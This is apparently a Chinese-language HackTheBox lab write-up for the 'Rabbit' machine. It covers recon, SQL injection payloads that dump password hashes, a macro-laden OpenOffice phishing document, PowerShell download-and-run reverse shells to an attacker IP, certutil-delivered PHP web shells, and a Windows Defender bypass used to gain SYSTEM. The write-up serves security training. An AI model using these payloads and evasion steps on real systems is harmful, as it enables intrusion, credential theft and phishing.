HTB靶机渗透系列之Rabbit

	Rabbit是一个非常困难的靶机，知识点涉及垂直越权、SQL注入、邮件钓鱼、服务提权、Windows Defender 绕过等感兴趣的同学可以在HackTheBox中进行学习。 通关思维导图 0x01 侦查 端口探测 首先通过nmap对目标进行端口扫描 nmap -Pn -p- -sV -sC -A 10.10.10.71 -oA nmap_Rabbit 扫描结果显示目标开放了80、88、135、443、445等端口，不愧是”狡兔三窟“ 80端口 访问后站点显示403 443端口 访问后发现这是 IIS 7 的默认界面 使用 gobuster 对站点进行目录扫描 gobuster dir -u https://10.10.10.71 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k 注意：需要添加-k参数英语跳过证书认证，否则会出现无效证书的报错信息 正常情况访问到的目录都指向https://10.10.10.71/owa 访问该目录发现这是 outlook 邮件登陆界面 Outlook是由微软公司所出品Office内的个人信息管理系统软件，功能包括收发电子邮件、查看日历等 8080端口 访问后发现这是一个演示界面 使用 gobuster 对站点进行目录扫描 gobuster dir -u http://10.10.10.71:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 结果存在两个301跳转，分别访问对应目录/joomla、/complain 在/joomla目录中未发现可利用点 /comlain目录则是一个名为 Complain Management System 的应用 默认账号密码 为admin/admin123，但无法登录 垂直越权漏洞 尝试在注册页面/complain/register.php中注册账户，设置账号密码为admin/admin123用户 类型为 Customer，注册完成后进入用户界面。 点击View Complain Details发现其参数对应的是mod=customer&view=compDetails 在请求中将参数mod修改为 admin 后可以发能够看到投诉详情，说明存在垂直越权漏洞 SQL注入漏洞 在 exploit-db 中我们发现 Complain Management System 除了越权以外还存在SQL注入漏洞路径 为/complain/view.php?mod=admin&view=repod&id=plans，开始尝试进行手工注入 参考文章1：https://www.exploit-db.com/exploits/42968 参考文章2：https://www.exploit-db.com/exploits/41131 首先获取数据库的基本信息，发现当前数据库版本为 5.7.19，当前用户为 Dbuser@localhost id=engineer union all select 1,version(),3,user(),5,database(),7-- 查看所有数据库名，其中包含secret、Joomla等 id=engineer union all select 1,schema_name,3,4,5,6,7 from information_schema.schemata-- 查看secret数据库中的所有表，其中包含users表 注意：需要将库名修改为hex编码 id=engineer union all select 1,table_name,3,4,5,6,7 from information_sc hema.tables where table_schema=0x736563726574-- 查看users表中所有列名，其中包含username和password id=engineer union all select 1,column_name,3,4,5,6,7 from informati on_schema.columns where table_name=0x7573657273-- 尝试获取users表中列名username和password当中的数据 id=engineer union all select 1,username,password,4,5,6,7 from secret.users-- 成功获取账号密码如下： Kain                33903fbcc0b1046a09edfaa0a65e8f8c Raziel            719da165a626b4cf23b626896c213b84 Ariel                B9c2538d92362e0e18e52d0ee9ca0c6f Dimitri            D459f76a5eeeed0eca8ab4476c144ac4 Magnus            370fc3559c9f0bff80543f2e1151c537 Zephon            13fa8abd10eed98d89fd6fc678afaf94 Turel                D322dc36451587ea2994c84c9d9717a1 Dumah                33da7a40473c1637f1a2e142f4925194 Malek                Dea56e47f1c62c30b83b70eb281a6c39 Moebius            A6f30815a43f38ec6de95b9a9d74da37 当然我们也可以直接利用 sqlmap 来获取对应信息 sqlmap -u 'http://10.10.10.71:8080/complain/view.php?mod=admin&view=repo d&id=plans' --cookie='PHPSESSID= ' -D secret -T users --dump 注意：需要在其中填入 Cookie 信息 在破解网站对获取到的密文进行破解 破解网站：https://crackstation.net/ 解密结果如下： 33903fbcc0b1046a09edfaa0a65e8f8c        md5        doradaybendita 719da165a626b4cf23b626896c213b84        md5        kelseylovesbarry B9c2538d92362e0e18e52d0ee9ca0c6f        md5        pussycatdolls D459f76a5eeeed0eca8ab4476c144ac4        md5        shaunamaloney 370fc3559c9f0bff80543f2e1151c537        md5        xNnWo6272k7x 13fa8abd10eed98d89fd6fc678afaf94        Unknown        Not found. D322dc36451587ea2994c84c9d9717a1        Unknown        Not found. 33da7a40473c1637f1a2e142f4925194        md5        popcorn Dea56e47f1c62c30b83b70eb281a6c39        md5        barcelona A6f30815a43f38ec6de95b9a9d74da37        md5        santiago 0x02 上线[raziel] OWA邮件系统 使用破解后的账号密码Kain/doradaybendita登录OWA 查看邮箱中的邮件以获取关键信息 在其中我们获取到如下信息： 1.Open Office 已部署 2.Windows Defender 已开启 3.PowerShell 已限制 制作木马 使用 MSF 针对 Open Office 生成反弹shell文档msf.odt msfconsole msf > use exploit/multi/misc/openoffice_document_macro msf > set srvhost 10.10.14.17 msf > set lhost 10.10.14.17 msf > run 将文档后缀名修改为.zip并将其解压 mv msf.odt msf.zip 解压后在其中找到Basic/Standard/目录，编辑文件Module1.xml并修改payload如下 powershell.exe IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.14.17 /powercat.ps1');powercat -c 10.10.14.17 -p 1234 -e cmd 根据提示信息可知目前 powershell 已被限制，尝试将其版本修改为2来绕过限制 powershell.exe -version 2 IEX (New-Object System.Net.Webclient).Downloa dString('http://10.10.14.17/powercat.ps1');powercat -c 10.10.14.17 -p 1234 -e cmd; 接下来将powercat.ps1复制到本目录下并开启 http 服务 cp /root/hackthebox/Machines/Jeeves/powercat.ps1 . python -m SimpleHTTPServer 80 在本地监听1234端口 nc -nvlp 1234 钓鱼邮件 在尝试发送邮件时又遇到一个小问题：选择邮件发送但是无法上传文件。通过不断尝试后我们发现 了解决方法只需要在登录界面选择轻量版登录即可 将用户切换为 Ariel 后上传文件并向每个联系人发送邮件 经过漫长的等待之后成功拿到反弹shell，但这个shell每隔一段时间就会自动断开 在当前用户桌面上寻找flag，成功拿到第一个flag dir C:\Users\Raziel\Desktop type C:\Users\Raziel\Desktop\user.txt 0x03 权限提升[system] 信息收集 查看系统信息，发现操作系统版本为 Windows Server 2008 R2 systeminfo 系统中安装多个补丁，经检测后发现无法使用内核提权 在进程中未发现可用信息 tasklist /v 在服务中发现 Apache 和 Mysql 服务，它们的运行权限都为系统权限，因此我们可以从这些服务入手完成提权 wmic service where started=true get name,startname Windows Defender限制 检查当前用户对wamp根目录拥有何种权限，结果显示具有写入权限 cacls C:\wamp64 既然如此我们可进入 web 目录并插入木马，但是木马cmd.php一经写入直接被 Windows Defender 杀掉 echo '<?php echo system($_GET["cmd"]);?>' > cmd.php certutil -urlcache -split -f http://10.10.14.17/cmd.php c:\wamp64\www\cmd.php 尝试上传 nc.exe，但没过一会 nc.exe 也被杀掉了 certutil  -f -split -urlcache  http://10.10.14.17/nc.exe C:\Temp\nc.exe 那么我们还是尝试使用之前的 powershell v2 来绕过 Windows Defender Windows Defender绕过 创建cmd.bat文件用于设置反弹shell powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadStrin g('http://10.10.14.17/powercat.ps1');powercat -c 10.10.14.17 -p 2345 -e cmd; 创建cmd.php文件用于执行bat文件 <?php echo exec("C:\wamp64\www\cmd.bat");?> 使用 certutil 上传cmd.bat、cmd.php certutil -urlcache -split -f http://10.10.14.17/cmd.php c:\wamp64\www\cmd.php certutil -urlcache -split -f http://10.10.14.17/cmd.bat c:\wamp64\www\cmd.bat 在本地监听2345端口 nc -nvlp 2345 访问木马地址/cmd.php可成功获得目标shell curl http://10.10.10.71:8080/cmd.php 在管理员桌面上寻找flag dir c:\Users\Administrator\Desktop type c:\Users\Administrator\Desktop\root.txt 成功获取第二个flag 总结：由于该靶机存在N多个端口，因此我们初期的工作就是寻找弱点。最终在位于8080端口的站点中找到了应用Complain Management System，通过搜索该应用系统的Nday漏洞，其中存在的SQL注入帮助我们获取到了需要的账号密码，利用其 中的账号密码登陆OWA并发送带有恶意odt的钓鱼邮件，受害者打开后会执行反弹shell，从而成功获取用户权限。在靶机中 存在杀软Windows Defender，我们可利用Powershell v2编写bat脚本用于绕过杀软，当然令人震惊的还是Apache服务的 运行权限居然是系统权限，我们可将木马上传至web站点，使用PHP执行bat脚本 这样就成功借助Apache服务提权至系统权限。